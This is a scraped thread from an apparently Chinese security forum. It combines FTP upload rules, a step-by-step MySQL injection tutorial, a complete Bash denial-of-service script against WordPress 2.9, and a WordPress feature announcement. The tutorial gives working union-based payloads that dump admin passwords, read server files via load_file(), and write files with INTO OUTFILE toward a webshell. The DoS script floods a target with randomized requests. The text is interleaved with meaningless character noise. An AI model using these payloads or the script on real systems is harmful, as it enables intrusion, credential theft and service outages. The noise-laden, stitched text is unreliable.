最近看过此主题的会员

返回列表 发帖

参考资料FTP规定.

1.上传资源压缩文本名称尽量和资源名称相符,不然应在主题贴中说明“该资源为FTP资源中×××”。上传在相应文件夹中。" G! L  w) a1 O: }
2. 会员上传资源后,应在FTP下载区及时回贴,将你上传的资源名称用主题方式帖出来,并注明文件所在地址。一来方便会员查找,二来也好让斑竹及时奖励。7 \6 Z/ C( R! Z- s+ r; g
3.请尽量按以下格式:2 P; I" C: [) e% T" d/ R" D4 v/ q
题名:
* c1 }) L- }9 T7 d格式:PDF/ISO/RAR/DOC/PPT/AVI/RM/MPEG等(尽量避免用超星PDG格式)
; g/ s8 l6 J8 A大小:不要小于15M(小于15M的文件,压缩成2048K,直接上传至论坛中)- f& e' I$ T' C- i/ D
语种:中文、英文或其它
7 e! J% q( }" X, E  X. u! |出版社:
" z8 q% C4 e6 J5 o( A* X简介:作者,出处、内容评价与介绍等。
" V* D1 t! X2 F(简介为必须信息,能提供截图或样张最好,以帮助会员认识该资源是否对自己有用,同时节约宝贵的服务器带宽,不要盲目下载以后才发现毫无用处。)( q3 B( L! a) l0 Y" _" e, F
解压密码: www.sitedirsec.com! _5 [2 @0 h/ q( u
不做必要介绍者,恕不加分!更不得评精华。
% i7 _4 N: }( `* O; L/ o6 `4. 上传帐号及查看方法见:http://www.sitedirsec.com/bbs/, E, h  x- ^$ y2 D  a
5. FTP容量是有限的,上传前要作搜索,对于重复的,质量或价值不高的,小于15M的上传资源将被删除。
% H" L# b4 R, k: s/ f) W$ E6 m/ W6. 对于七天内还没上传完毕者一律删除.
& x4 e/ }4 T+ y1 B1 j7. 软件压缩包解压出错时,上传者应及时补救出错卷压缩包

 

您可能还想看的主题:

IIS FTP Server7.0以下版本拒绝服务漏洞

非安全中国FTP使用制度

FTP密探

非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
2、本话题由:小杨发表,本帖发表者小杨符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
3、其他单位或个人使用、转载或引用本帖时必须征得发表者小杨和本站的同意;
4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
6、本站管理员和版主有权不事先通知发帖者而删除本文。

是转的把 ,说得不错 再看一次
& c6 f1 x2 _' C2 x+ N6 n+ T) P0 w3 l1 k2 Q# f3 c
+ ?7 R  p- f) }9 b) T8 s7 E

3 o  @% L5 q$ f( d8 E
, C. p3 ]9 b' s3 B* J) X4 B0 r7 @* C4 n: M! q

& p6 e; }- q2 @+ `1 r1 J1 y- @( p% k  u

/ P3 c+ N: K  B9 Y
! T8 }$ q# n/ j# M! z4 n! P( n1 T: o; W) {8 D
1 L% c$ ?4 H: L
9 S2 a/ N" R8 k8 X' o( C! Y  U
4 ~4 w4 a, e2 K5 |

3 C" d- v- G9 Y4 ?$ e( _. S0 s0 t5 J5 Q

$ o6 x8 ]: e) N; N! D) V8 z; [. Q
+ p/ Q& O' o9 H( ?9 b
5 c; P: Q. i0 o( o6 g公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

MYSQL注射语句大全
1.MYSQL 注射的产生.     漏洞产生原因 : 程序执行中未对敏感字符进行过滤,使得攻击者传入恶意字符串与结构化数据查询语句合并,并且执行恶意代码.     咱们先创造一个没有过滤的程序. 因为我机器上没有PHP,所以我就是用 JAVA了,我会详细注释. 代码 数据库: create database if not exists `test`; USE `test`; /*数据表 `account` 的表结构*/ DROP TABLE IF EXISTS `account`; CREATE TABLE `account` (   `accountId` bigint(20) NOT NULL auto_increment,   `accountName` varchar(32) default NULL,   `accountPass` varchar(32) default NULL,   PRIMARY KEY  (`accountId`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; /*数据表 `account` 的数据*/ insert into `account` values   (1,'account1','account1'); /*数据表 `admin` 的表结构*/ DROP TABLE IF EXISTS `admin`; CREATE TABLE `admin` (   `adminId` bigint(20) NOT NULL auto_increment,   `adminName` varchar(32) default NULL,   `adminPass` varchar(32) default NULL,   PRIMARY KEY  (`adminId`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; /*数据表 `admin` 的数据*/ insert into `admin` values   (1,'admin','admin'); : 程序: <%@ page language="java" import="java.util.*,java.sql.*" pageEncoding="utf-8"%> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html>   <body> <% //连接MYSQL的字符串. //jdbc:mysql://localhost:3306/test //驱动:数据库://地址:端口/数据库名称 String mysqlConnection = "jdbc:mysql://localhost:3306/test"; //加载驱动  com.mysql.jdbc.Driver 是JAVA与MYSQL 连接用的JDBC驱动 Class.forName("com.mysql.jdbc.Driver").newInstance(); //建立MYSQL链接 root是用户名 cx0321 是密码 Connection connection = DriverManager.getConnection(mysqlConnection, "root", "cx0321"); //建立一个查询对象 Statement statment = connection.createStatement(); //建立一个查询返回集合. 就是说查询完以后返回的数据全部都在这个里面. ResultSet resultSet = null; //从account里面读取数据. resultSet = statment.executeQuery("select * from account where accountId = '"+ request.getParameter("id") +"'"); //循环,直到resultSet结束 while(resultSet.next()) { //从resultSet读取出值输出到页面.     out.print(resultSet.getInt(1)+"|");//取出第一列的值,因为是数字类型的所以是getInt();     out.print(resultSet.getString(2)+"|");//取出第二列的值,因为是字符串类型的所以是getString();     out.print(resultSet.getString(3)+"|");     out.print("<br />");//页面输出换行 } %>   </body> </html> 2.漏洞的利用 (图1) 这个就是数据库里的记录了.以后黄色为关键语句,红色为输入的部分.     大家注意看resultSet = statment.executeQuery("select * from account where accountId = '"+ request.getParameter("id") +"'"); 这里的request.getParameter("id") 是获取GET传参的id 参数,也就是mysqlInject.jsp?id=1 这里的id. 这样这个SQL语句就变成了select * from account where accountId = '1' 了.如果加以变换呢? 2.1漏洞的检测 我们把id 写成mysqlInject.jsp?id=1' 那么SQL 语句就变成select * from account where accountId = '1'' 了,这样的话SQL语句就会报错,因为SQL语句的值是需要2个包含符号,比如’和”如果只是数字可以什么都不写.如果不报错的话就说明程序替换,过滤或者其他方法来防护了. 那么我们可以继续来测验, mysqlInject.jsp?id=1' and ''=' 那么SQL语句就变成了select * from account where accountId = '1' and '' = '' ,应该返回正常. 有些人说我的为什么返回不正常呢? 有2种原因,第一是程序把恶意字符过滤了;第二是程序的语句和我写的不一样select * from account where accountId = 1' and ''='. 这个问题在下边会谈到. 2.2 Union查询猜此次查询列的数量     这里有的人会说猜此次查询列的数量有什么用?如果只是检测当然没有,但是你想进一步的利用那么就有大的用处了,文章后边会讲到的,耐心.     如果懂SQL的人应该知道UNION查询吧?UNION查询就是联合查询,执行第二条查询语句将返回值和本次查询合并.     大家想想,如果要和本次查询值合并需要一个什么条件呢?需要联合查询的列数和此次查询的列数相等.如果不想等的话就会无法合并,那么就会报错.通过这一特点聪明的你应该会想出这么才列数了吧? 那么我们要的就是使得UNION查询出来的列数与本次查询出来的列数相等.也就是说不报错就会相等. 先从第一列开始猜,那么要把这个语句union select 1构造在地址程序的语句当中. 那么语句就是mysqlInject.jsp?id=1' and union select 1 and ''=' 这样的. 有些人问为什么后边(绿色的部分)要加上and ''=' 呢? 也许大家记了吧,我们的SQL语句是需要两个包含符号的,语句select * from account where accountId = '1' 我们输入的是在1那个位置,所以要去除后边的',否则语句会报错的. 在本程序里也就是' 如果你要想消除' 有很多办法,为了让大家明白所以我现在使用and ''='. 先说一说有几种办法消除这个' 1.    使用 and '' = ' 虽然不够方便,但是在复杂SQL语句里不会报错的. 2.    使用注释 # 或者 /**/, 这样可以把后面的东西全部注释掉,但是有一个大问题,就是在执行复杂SQL语句的时候有可能会报错. 有些人测试,咦?为什么我加了#还是会报错呢?因为本次是使用GET传参,在地址栏传参.大家想想,当初下载带#名称的数据库是什么样子呢?哦,对了,#是地址栏的结束符,就是说#包括#以后的字符全部不传入.所以#在GET模式下注入注入不起作用. 那么有些工具写的在构造注射的时候为什么是mysqlInject.jsp?id=1'/**/and/**/union/**/select/**/1/**/and/**/''/**/= /**/'/* 呢? 因为在程序里边有函数可以把传入参数里面的空格去除,如果去除了空格,将会是程序产生了错误的语句,那么就会一直报错了.所以有些工具就是用/**/这种东西来取代空格了. 那 /**/ 又是什么呢? /**/ 是一种注释,叫做文档注释,就是从/* 开始直到*/ 结束,中间任何代码都会成为注释,所以是程序员在写大量注释时候所使用的一种注释. 那最后的/* 是什么呢? 那个是用来解决 SQL语句 包含符号没有成双成对的. 我们开始测试. mysqlInject.jsp?id=1 '/**/union/**/select/**/1/* select * from account where accountId = '1 '/**/union/**/select/**/1/*'. 注意到最低下那句话了吗? javax.servlet.ServletException: The used SELECT statements have a different number of columns 大概意思是”这个使用的查询列数不同”,由此得出此次查询不是查询了一个表. 以此类推, select 1   select 1,2   select 1,2,3  知道正确位置,那么你现在说写的列数也就是本次查询的列数了. 大家看到地下返回 1|2|3| ,这个值是从咱们的UNION查询里合并出来的. 试试把UNION SELECT 1,2,3 换成 UNION SELECT 4,5,6 看看.地下是不是编程了 4|5|6| 了? 有人说 你都是骗人的 我怎么换,我都换到789了也没有出来,还是现实原来的数据,你骗人;我没有骗人,我也不会骗人;那为什么出不来? 有些程序写的时候只是把数据返回集合的第一行输出,但是UNION查询以后是把数据合并到此次查询以后,那么他只输出了此次查询的数据,其实UNION查询的数据也有,但是他没有输出.那怎么办呢?聪明的人一定会想到. 啊,原来如此,只要让此次查询不输出就可以了.哈哈哈,我聪明了,可是怎么让此次查询不输出呢? 先告诉大家一个简单的方法,看看SQL语句,我们是做过限制条件的. Where accountid = ? ,那么也就是说让这个accoundId 限制到一个没有的id 上那么不就会没有了? 心动不如行动,试试. mysqlInject.jsp?id=1000'/**/union/**/select/**/4,5,6/* select * from account where accountId =1000'/**/union/**/select/**/4,5,6/* 哈哈,果然没有了!!! 注意绿色的部分,指定查询一个没有的id ,那么他理所当然的就会蒸发了. 2.3 低几率另类猜此次查询列的数量     此方法虽然几率低一点,但是会大大减少工作量的.次方法只适用于 select * 的简易SQL语句.     这个方法是用的是 mysql 里的 order 排序. 排序是按照顺序排下来.我们来写一条SQL语句. Select * from account where accountId = '1' order by accountId 那么这个SQL语句也就是根据 accountId 升序排序. 那么我们不知道他有什么怎么办,而且这怎么猜? 这里是关键问题. MYSQL支持列编号排序Select * from account where accountId = '1' order by 1 这样也就是按照第一列排序. 哎呀,你又在骗我们,排序怎么猜列的数量? 那么我按照一个不存在的列排序呢? 比如第四列? 你一般身上有3个口袋,一个最多10元钱,一天吃一顿,一顿3斤米,一斤米一元,但是你今天吃了4斤米,需要40元,你却只有3个口袋,你就没有40元,你就要挨打了. 也就是说一共有3个列,order by 3 ,按照第3列排序,正常,order by 4,按照第4列排序,没有第4列,出错.那么也就说明他有4列. 这种方法是根据人的经验判断的.我一般使用这个方法都会成功,就是不成功也相差不多. 2.4 使用UNION猜其他表,查询其他表 使用此方法可以查询到其他表里的内容.比如查询管理员的密码等.但是有个前题,必须道要才表的表名和列名. 那怎么才能知道呢? 猜!!! 因为MYSQL 和SQLSERVER 的系统函数不一样,SQLSERVER 里有 SP_HELPDB 而MYSQL 里没有,所以只能猜了. 好,开始构造语句. 我们要猜看看有没有admin表. mysqlInject.jsp?id=1'/**/union/**/select/**/4,5,6/**/from/**/admin/* SQL : select * from account where accountId = '1'/**/union/**/select/**/4,5,6/**/from/**/admin/*'     如果正常的有admin表的话,那么返回是正常的,如果没有的话会报错的. 大家看到了吧? 有admin 这个表,为了让大家更好的理解,我们在猜一个其他不存在的表. mysqlInject.jsp?id=1'/**/union/**/select/**/4,5,6/**/from/**/helloword/* SQL : select * from account where accountId = '1'/**/union/**/select/**/4,5,6/**/from/**/ helloword/*' 看到了吧?没有 helloworld 这个表.所以报错了.     又问,为什么还是会写4,5,6呢? 啊哈,因为我们不知道他的列名,如果写了 * 他将会全部列出来,如果和此次查询的列不相等,那么就会报错了.所以要写一个相等的.     现在表名出来了,怎么才列名呢?哎呀,大家太聪明了,直接把4,5,6其中一个替换成列名不久行了? 那么构造出. mysqlInject.jsp?id=1'/**/union/**/select/**/adminId,5,6/**/from/**/admin/* SQL : select * from account where accountId = '1'/**/union/**/select/**/adminid,5,6/**/from/**/admin/*'     看见了吗? 1|5|6 的一就是 adminid.如果正常那么就是存在了. 大家可以把列名猜出来,然后带入UNION查询中,这样就查出来管理员帐号或者密码了.现在我要把列名一次全部带入. mysqlInject.jsp?id=1'/**/union/**/select/**/adminId,adminName,adminPass/**/from/**/admin/* SQL : select * from account where accountId = '1'/**/union/**/select/**/adminid,adminName,adminPass/**/from/**/admin/*'     哈哈,出来了, 1|admin|admin| 就是 adminid|adminName|adminPass|     也可以在union 查询上限制条件,比如你知道有admin这个用户那么就构造 union select adminId,adminName,adminPass from admin where adminName = ‘admin’,看个人的发挥了. 2.5    使用MYSQL 系统函数. 2.5.1.1.1    使用 load_file() 函数 显示文件.   Load_file 顾名思义.就是加载文件,可不是运行啊,是显示内容,但是必须对文件拥有读取权限.我们先来构造一个显示 c:oot.ini 文件的语句. mysqlInject.jsp?id=1'/**/union/**/select/**/1,load_file(0x633A5C626F6F742E696E69),3/*     SQL : select * from account where accountId = '1'/**/union/**/select/**/1, load_file(0x633A5C626F6F742E696E69),3/*'        看到了吗? C:oot.ini 文件的内容. 又问,为什么load_file() 里面是乱码呢? 那不是乱码,那个是C:oot.ini 16进制编码. 因为本函数无法处理直接写的路径,只能能使用16进制或者是 Ascii 编码.所以要将路径转换成 16进制或者是Ascii 编码才可以执行.   又问,为什么load_file 是在第二列的位置上,不是在第一列或者第三列的位置上呢?因为啊,第一列不行,其他的都可以,第一列是一个 INT类型,一个数字类型,难道你会把你女朋友送进男厕所吗? 呵呵.玩笑.如果是在 linux 下可以使用 / 来列目录 ,但是必须有列目录的权限.   通过load_file 可以列目录,读文件,但是遇到文件格式编码的时候也许会遇到乱码的问题. 这个问题可以这么解决. 使用 subString 函数, subString(字符串,开始,返回).   假设我们要返回第三个字符,那么就是mysqlInject.jsp?id=1'/**/union/**/select/**/1,substring(load_file(0x633A5C626F6F742E696E69),3,1) ,3/* 这样我们就返回了第三个字符,用于解决乱码是非常好的办法.   我近期会做一个这样个工具,将会公布在我的个人主页上. 2.5.1.1.2    使用outfile 写WEBSHELL.   mysql 有一个功能,就是把查询的结果输出.就是outfile.先来构造一个简单的语句.   select ‘hello word’ into outfile ‘c:\a.txt’ 这里是讲 ‘hello word’ 输出到 c:a.txt 那么在网站也来构造一下. mysqlInject.jsp?id=1'/**/union/**/select/**/1,'hello',3/**/into/**/outfile/**/'c:\hello.txt'/*     SQL : select * from account where accountId = '1'/**/union/**/select/**/1, 'hello',3/**/into/**/outfile/**/’c:\hello.txt’/*'    成功插入.但是为什么会报错呢?哦,那是因为你把数据写到文件中,返回集合什么都没有了,当然会报错了.如果你把hello 换成 一句话或者其他的,如果写入到网站目录下,那是多么恐怖啊…
# Y9 f  i" Z/ @$ d
! q3 C  g2 `$ D6 s8 r4 z4 Z( w; F) X$ @) U
2 P; X9 i' |2 o& J, v! A' Q) R

& C+ K% D! _: D! [8 @7 Q2 Q9 B
7 }3 H( Z; X: d! _# F8 l$ `# J0 x$ O

: G/ @! G6 {/ T4 g& Y$ K" B4 C0 U- n, e2 `$ w2 J9 C- G

$ H4 a5 ]) a8 v4 I+ V+ v) B. T
# S) G- ]0 Q4 l- w. W% E; T( p; s- J. I  F
0 N, @4 B5 ~- G
' }: U# F' z" h" P: p4 @
$ c! {9 c/ X; E2 b! M; j" B6 Q, W
( {3 _; ~# R: W, o2 \4 s7 {

; C6 z& [  x0 h0 K. N) b
$ D4 X; g' D; J2 o$ m3 ^( e* w/ e/ P" W; [
公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

Wordpress 2.9 0day DOS EXP
#!/bin/bash## Copyright (C) 2009 Emanuele Gentili < emgent@backtrack.it >## This program is released under the terms of the GNU General Public License# (GPL), which is distributed with this software in the file "COPYING".# The GPL specifies the terms under which users may copy and use this software.## WPd0s.sh# This is a 0day DOS issue for Wordpress Core that use cache stressing with random# parameter on multime requests.#show_help(){  echo ""  echo " 2009 (C) WPd0s.sh - 0day Wordpress DOS <= 2.9"  echo ""  echo " --usage    show the exploit Usage"  echo " --prereq      show the exploit Prerequisites"  echo " --credits  show the exploit Credits"  echo " --help     show the Help"  echo ""  echo "Emanuele Gentili <emgent@backtrack.it>"}show_credits(){  echo ""  echo " Emanuele 'emgent' Gentili"  echo " http://www.backtrack.it/~emgent/"  echo " emgent @ backtrack.it"  echo ""}show_prereq(){echo ""echo " 2009 (C) WPd0s.sh - 0day Wordpress DOS <= 2.9"echo ""echo " Prerequeisites:"echo " Bash (yeah because is cool.)"echo " Curl"echo ""echo " Emanuele Gentili <emgent@backtrack.it>"}show_usage(){  echo ""  echo " 2009 (C) WPd0s.sh - 0day Wordpress DOS <= 2.9"  echo ""  echo " usage $0 --host http://localhost/wordpress/ --requests 1000"  echo ""  echo " Emanuele Gentili <emgent@backtrack.it>"}# Bashwhile [[ $# != 0 ]]; do    arg_name=$1; shift    case "$arg_name" in      --help|-?|-h) show_help; exit 0;;      --credits) show_credits; exit 0;;      --usage) show_usage; exit 0;;      --prereq) show_prereq; exit 0;;      --host) host=$1; shift;;      --requests) requests=$1; shift;;      *) echo "invalid option: $1"; show_help;exit 1;;    esacdone[ -z "$host" ] &amp;&amp; { show_help; exit 1; }for random in `seq 1 $requests`; docurl -A Firefox -o --url "$host/?cat=2&amp;d0s=1&amp;d0s=$random" > /dev/null 2>&amp;1 &amp;done

( |) v0 x4 \9 V
文章来源:http://safe.cd/article.asp?id=59
  @3 i# E  |; U0 R

2 n- D1 e. }* F& n6 {$ C
  r& S2 }" ~* Y/ X5 w( w2 s. A/ X* Q; D: V* h6 a" ^$ R6 w

# p( I8 r! A$ `; O: l* ]+ k9 j7 }7 r) X- a8 D6 q, q
. B7 a1 y. P! f& W1 B% n

" \# j# U2 P* m" W8 Z8 o, T4 h3 N3 S% w/ S
/ I6 u  Z0 `: U  l# @7 j

$ v5 s' y/ S; M; `- o* k+ v6 e6 X- c6 E3 {; @/ {

: r! Q& }. q& y. y
: W. z8 g8 K! n6 p/ P- h2 m. f" h+ ]
+ D) X7 ~5 }" k6 J4 g
' A# P: p. [* y+ E

2 I$ ^, I/ a" j2 e3 z
1 e- L# E9 N, ^公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

架设完全属于你自己的Blog工具WordPress
  
& s- X0 z+ o; v/ }* n( k$ |7 g& ]
<P style="TEXT-INDENT: 2em">WordPress是一个Blog程序,用它你可以架设完全属于你自己的Blog。而WordPress现在的应用又不仅仅只是在Blog方面,因为其强大的扩展性,部分网站甚至已经开始使用WordPress来架设,或者说这些 Blog你甚至都看不出它们只是Blog而已了。 $ w' c) e* q3 e3 e! u+ H
<P style="TEXT-INDENT: 2em">/ _, m  U; p' ~1 P; {5 I- i3 V
<P style="TEXT-INDENT: 2em">新功能: " d1 w3 s/ d$ r' A8 a
<P style="TEXT-INDENT: 2em">WordPress Widgets 让您可以只需要鼠标简单拖放操作便可重新安排和自定义您的 Blog (通常是侧边栏)。此功能最初是 Widgets 插件引入的,现在成为了 Wordpress 的默认核心代码,做了大量的优化,并且默认主题启用了这个功能。 / k7 c& F' f7 d4 d4 l9 |. ]8 ~
<P style="TEXT-INDENT: 2em">完整的 Atom 支持,包括更新我们的 Atom 聚合以符合 1.0 标准,并实现了 Atom 发布 API 以和原有 XML-RPC 接口互补。
. ^  ]  X% Q0 E5 t6 p& p9 g; `<P style="TEXT-INDENT: 2em">全新 Blogger 导入程序可以让您导入新版 Google Blogger,只要输入登录信息,便可全自动无需人工干预无缝的导入文章和评论。
( z; a+ {; F& t/ D. T<P style="TEXT-INDENT: 2em">无限评论流,意思是在编辑评论页面,当您使用 AJAX 链接删除评论或将评论标记为垃圾评论时,系统会自动从后台调取较早的评论显示出来,补充刚才删除的评论,这样能够保证评论管理页面总是显示 20 条评论。
, Z  w2 A6 [& E# u. U<P style="TEXT-INDENT: 2em">现在可能导致 Blog 无法工作的插件将被自动禁用。 7 f% b8 X" T. l) O7 t
<P style="TEXT-INDENT: 2em">核心插件和过滤器进行了速度优化,您应该能感觉到进行任何操作时速度上的提升。
# K- \5 \% y) z<P style="TEXT-INDENT: 2em">我们未来版本的 Safari 浏览器的所见即所得支持提供了一个钩子。 另外还有大量的用户界面和易用性方面的增强,比如选项的描述用语到编辑文章或页面时编辑框上新增的快速查看链接。开发者功能: 我们也增强了底层的代码。如果您是一个开发者,请不要错过下面的说明:
0 X0 n) C$ E9 A) ^0 ~7 D- g<P style="TEXT-INDENT: 2em">一个全新的 WordPress 特定的 XML-RPC API 集,允许您编辑页面、设置分类等。
$ R2 Q* r% d: c; X, M- e6 A<P style="TEXT-INDENT: 2em">我们现在使用 jQuery 来处理内部的功能,并希望未来所有的 JS 应用都使用它。 5 h9 O( y! Z$ v; \: G) _# I
<P style="TEXT-INDENT: 2em">评论聚合现在支持多种格式,包括 Atom。 ) y9 Q. ]% [0 d3 a( S7 c
<P style="TEXT-INDENT: 2em">内部发送 Email 功能现在采用 phpMailer,支持 SMTP。
# b- e2 _8 R8 E$ u* a1 s<P style="TEXT-INDENT: 2em">您现在可以在配置文件设置数据库整理和字符集。
5 N$ T6 @/ F# c+ I- z0 h. O<P style="TEXT-INDENT: 2em">您也可以在配置文件中强制写入您的网站和 WP 的网址,覆盖数据库中储存的设置。
1 h/ _$ x# {* T' X<P style="TEXT-INDENT: 2em">最后我们增加了 WP 代码中的函数文档,可以帮助您更快理解那些代码。 2 u, }* B$ |* U8 C; {4 X
<P style="TEXT-INDENT: 2em">6 Y; y% p& s! b3 d
<P style="TEXT-INDENT: 2em">下载WordPress 2.2.3 Final地址:http://wordpress.org/wordpress-2.2.3.zip [/quote]  g" w; Y# a7 }- _+ n

5 L, Q0 d+ L" O. |) o/ K; G2 h& ]* \8 {5 m
- x& q4 ^; _% w( U8 T" W' z/ [9 n& f

- R. o  A/ o" o$ M% [3 q6 y; |! j$ ~6 t

1 B1 d1 J5 ?0 q0 M" A$ S( F+ N, p9 l$ G$ r9 X2 E

0 K! Y% n4 y6 O( J4 i
# k% q3 Y& W+ T, l  l
: ?; [. n5 |, n2 S) e1 V% }% \5 r/ N

7 Q' i8 k# q5 E5 b: A8 q  c6 t
/ S7 I2 B" d8 I0 ]# G0 q
( e& x2 O6 }4 X( l' N. S/ w: u6 Z; S) v  }

! M, j$ B' J6 E# ^$ k7 p- S) k$ f' o

4 B3 w1 P- U# x( p" b! q公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表